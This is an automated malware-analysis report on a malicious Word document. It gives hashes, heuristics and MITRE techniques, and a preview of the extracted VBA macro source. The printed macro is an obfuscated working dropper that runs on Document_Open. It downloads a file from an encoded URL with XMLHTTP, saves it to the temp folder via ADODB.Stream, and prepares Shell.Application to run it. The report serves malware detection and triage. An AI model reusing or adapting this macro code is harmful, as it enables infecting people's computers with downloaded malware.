Office (OLE) malware analysis — malicious · 8835a094dbdea4f5

MALICIOUS

Office (OLE)

128.5 KB Created: 2020-04-19 09:19:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: a4ca01684d65fc4434335aa554c326d4 SHA-1: c01c3ade94f659faa0cd33e2951f6399c1573ab9 SHA-256: 8835a094dbdea4f580f57daa2e42a70bc0075d9e8eadbf0a80980c23e6a16f21

172 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the macros are designed to download a file from an HTTP URL and save it to disk, which is then likely executed. The 'CreateObject' call and 'Document_Open' macro further support this malicious intent.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.

Matched line in script

TWMSSBCEZMTQIYZKYBINXEXRFPPDTDVXKXEBJITEQMLQYGRLPCYNOFPRVQGLLKMYCFUBBJKMIUCXQHISHJQOGMYZNRXLVLWGSGLIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBC = SYNWMYHNHGDMLVOTWUZJJTUZLCQYORBFZQNNNPIFIXKDLNOKWLBSQLVQMSXPPJCPBHOFNHJVPOLUSEPCFDIKRCDIMKYGPZJHCRVVVXQMQFMLTVWSFNJBSTERUBGQXRKXJIWNVOQERWTDBMXKGEKSZKEJUSHIXILPJZEEEGRUYNUTJK.responseBody

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15629 bytes
SHA-256: `e32460bd22e7e205a64590c5897cc68a2f2bebc2ee832aa5ac01a9f1eaaa7ae2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 75 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function CleanEncryptSTR(OVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJ As String) As String Dim WHNHZOYYMDMFHTHMJSRDNZVTZIPBUYLIWXOXBFZPTUTVILOEKKRTVRELHZQRCQSZXPVIIVBHUFUGPCPURBSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXU As String WHNHZOYYMDMFHTHMJSRDNZVTZIPBUYLIWXOXBFZPTUTVILOEKKRTVRELHZQRCQSZXPVIIVBHUFUGPCPURBSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXU = "&0123456789;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" Dim THJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYWOVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMB As String Dim LECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODC As Boolean THJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYWOVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMB = "DFHSGFJHSHFBDFBDFGSDRBRHBESRBERGSERHRHESDRGRFDBSDRGEARGHERGHESRHERGESRGESRHEHRFGBHSRGHESDRHERHBDRFGBHSDFGESRGHEWSRGHSGBESRGHESRHAREGERGASGHESRHESRHESRHERGESRGSERGASGEARGAREGHEHEAHRSE" LECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODC = False Dim i As Integer Dim TNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZU As Integer Dim KOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKUR As String Dim MCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLT As Integer Dim TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM As Integer Dim BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR As String If Len(THJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYWOVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMB) > 0 Then For i = 1 To Len(OVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJ) KOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKUR = Mid(OVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJ, i, 1) MCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLT = InStr(WHNHZOYYMDMFHTHMJSRDNZVTZIPBUYLIWXOXBFZPTUTVILOEKKRTVRELHZQRCQSZXPVIIVBHUFUGPCPURBSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXU, KOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKUR) If MCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLT > 0 Then TNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZU = Asc(Mid(THJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYWOVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMB, i Mod Len(THJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYWOVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMB) + 1, 1)) If LECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODC Then TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM = MCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLT + TNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZU Else TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM = MCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLT - TNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZU End If TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM = TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM Mod Len(WHNHZOYYMDMFHTHMJSRDNZVTZIPBUYLIWXOXBFZPTUTVILOEKKRTVRELHZQRCQSZXPVIIVBHUFUGPCPURBSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXU) If TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM <= 0 Then TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM = TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM + Len(WHNHZOYYMDMFHTHMJSRDNZVTZIPBUYLIWXOXBFZPTUTVILOEKKRTVRELHZQRCQSZXPVIIVBHUFUGPCPURBSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXU) End If BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR = BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR & Mid(WHNHZOYYMDMFHTHMJSRDNZVTZIPBUYLIWXOXBFZPTUTVILOEKKRTVRELHZQRCQSZXPVIIVBHUFUGPCPURBSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXU, TFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKURMCGHGIBXBQWWEGHDPXTMDEODFLQBICUITSHXGZCOCHENMXIUQOUDKUOTFDRSJSVZUKOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPM, 1) Else BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR = BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR & KOPOQCGJYFEMOPLXGCTLMWKNTSJQDDQUBPYOBKWKPMVNYQVYWDLSWWCNLZBRUEIDSQQPRKNRZNMUPRNZODCTNXSOVBRRLLYDJXHWJRXSQNWVHYEHFLTTFFKVMBJYCMQLBXYXZSPSIVOVXZVIVLECVGBWEIZZTMZLRYPYRTGZYVFEPZMPNTUCMNSWUJRBKUR End If Next i Else BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR = OVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJ End If CleanEncryptSTR = BSEVBECIQXCDHTQFGWZJNIXVVUXPTWFSSZUWSFTJIYSDYTBGXWQQEIPDMDOXEXWTCBMEJMKQYZKLPBRGOFIRVQGEEDGXUXNBTCDFBNCQJHBLHCJOFFYSGQWEUEWYLGECKJUFRUSYZHSSXDZOWGQZWRHMMLNGDGVCCKLNJVDYRIJTIKR End Function Private Sub Document_Open() Const OVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJ = 2 Dim fso: Set fso = CreateObject("Scripting.FileSystemObject") ZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYW = fso.GetSpecialFolder(OVIIVZGUETGOCOURBSEVBECHQXBCHSQFGVYIMHXUVUWPSWFRRZUVRESIHXSDXTZFWWQQEIODMCOWDWVSCZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJ) Dim LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV Set LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV = CreateObject("ADODB.STREAM") VGJEURSRTMPTCPOWRSOBPFEUPZUQWCTTNNBFLZJYLTZTSPYXJBGJHMVVGHMXODLBENRMDZBZCURUKWPXZBWJXNFDXIDYFKCCVOCNTBRZTVICBXHFQCORPUWEOPUYWLSCMVTOEIIIKDYDRYXGIJFRZVNFGQEHNSDKEWKVUJZIBDQEJGPNYKWSQWFM = ZLEJMKPYYJKPBRGNEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPTTSVHKODKJRTUQDKHYPRBPRYW + CleanEncryptSTR("\bpXHg.x4k") Set BHMEEXQEPVDTCVXKEDZJHSEQTRWYGQRWBYNUEOXVQGKKKMFBFTBZIKLHTCXPHISGJPUFMGYMXWLCKDFSGLIRPBMYUSYHOYSXJHVWMWZEXOSSRUGJNCJIQSTPCJGXOQBOQXVNUHHUYFTDSFNBNTQZRDUZDBGPWZBGRPEFUXILGWTUTVORVERQY = CreateObject("SHELL.APPLICATION") Set SYNWMYHNHGDMLVOTWUZJJTUZLCQYORBFZQNNNPIFIXKDLNOKWLBSQLVQMSXPPJCPBHOFNHJVPOLUSEPCFDIKRCDIMKYGPZJHCRVVVXQMQFMLTVWSFNJBSTERUBGQXRKXJIWNVOQERWTDBMXKGEKSZKEJUSHIXILPJZEEEGRUYNUTJK = CreateObject("MICROSOFT.XMLHTTP") SYNWMYHNHGDMLVOTWUZJJTUZLCQYORBFZQNNNPIFIXKDLNOKWLBSQLVQMSXPPJCPBHOFNHJVPOLUSEPCFDIKRCDIMKYGPZJHCRVVVXQMQFMLTVWSFNJBSTERUBGQXRKXJIWNVOQERWTDBMXKGEKSZKEJUSHIXILPJZEEEGRUYNUTJK.Open "get", CleanEncryptSTR("n0Awy://31y.&rpuhw.wg/lq052qfv/J7ICOBBJ/LAv;e8Q8ulC6IDk5N8Gf/hW-dpxA9.jEw"), False MNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPT = 1 SYNWMYHNHGDMLVOTWUZJJTUZLCQYORBFZQNNNPIFIXKDLNOKWLBSQLVQMSXPPJCPBHOFNHJVPOLUSEPCFDIKRCDIMKYGPZJHCRVVVXQMQFMLTVWSFNJBSTERUBGQXRKXJIWNVOQERWTDBMXKGEKSZKEJUSHIXILPJZEEEGRUYNUTJK.send TWMSSBCEZMTQIYZKYBINXEXRFPPDTDVXKXEBJITEQMLQYGRLPCYNOFPRVQGLLKMYCFUBBJKMIUCXQHISHJQOGMYZNRXLVLWGSGLIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBC = SYNWMYHNHGDMLVOTWUZJJTUZLCQYORBFZQNNNPIFIXKDLNOKWLBSQLVQMSXPPJCPBHOFNHJVPOLUSEPCFDIKRCDIMKYGPZJHCRVVVXQMQFMLTVWSFNJBSTERUBGQXRKXJIWNVOQERWTDBMXKGEKSZKEJUSHIXILPJZEEEGRUYNUTJK.responseBody If SYNWMYHNHGDMLVOTWUZJJTUZLCQYORBFZQNNNPIFIXKDLNOKWLBSQLVQMSXPPJCPBHOFNHJVPOLUSEPCFDIKRCDIMKYGPZJHCRVVVXQMQFMLTVWSFNJBSTERUBGQXRKXJIWNVOQERWTDBMXKGEKSZKEJUSHIXILPJZEEEGRUYNUTJK.Status = 200 Then LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV.Open LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV.Type = MNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPT LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV.Write TWMSSBCEZMTQIYZKYBINXEXRFPPDTDVXKXEBJITEQMLQYGRLPCYNOFPRVQGLLKMYCFUBBJKMIUCXQHISHJQOGMYZNRXLVLWGSGLIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBC LIRJUMSUSYHOSTXKHVWNQZEYOMMLOHKNVJJRMNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFVYIMHWUUTWOLPERKSUVRESIZXRCXSZFWVPJWIOUMUNPDWVSBZLWILJPQYJKOTQFNWHQNIXDDCFWTWMSSBCEZMTQIYZKYBINXEXRFPPDTDV.SaveToFile VGJEURSRTMPTCPOWRSOBPFEUPZUQWCTTNNBFLZJYLTZTSPYXJBGJHMVVGHMXODLBENRMDZBZCURUKWPXZBWJXNFDXIDYFKCCVOCNTBRZTVICBXHFQCORPUWEOPUYWLSCMVTOEIIIKDYDRYXGIJFRZVNFGQEHNSDKEWKVUJZIBDQEJGPNYKWSQWFM, MNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPT + MNJVKZYPJTPKRWOOHHVZGTETFOUONKTRDUZDBHPQBCGSIXFEHQUPFDDDFXTXMZSBDEZMBQIGBLGCINFFYRFQWEUDVXLFEBKITFRUSXZHRSWCZOVFPYWRHLLLNGCGUCBJLMIUCYQIJTHJQVGNHZNYXMDLEGTGMJSQCNZVTZIPZTYKIWXNXBEYPT 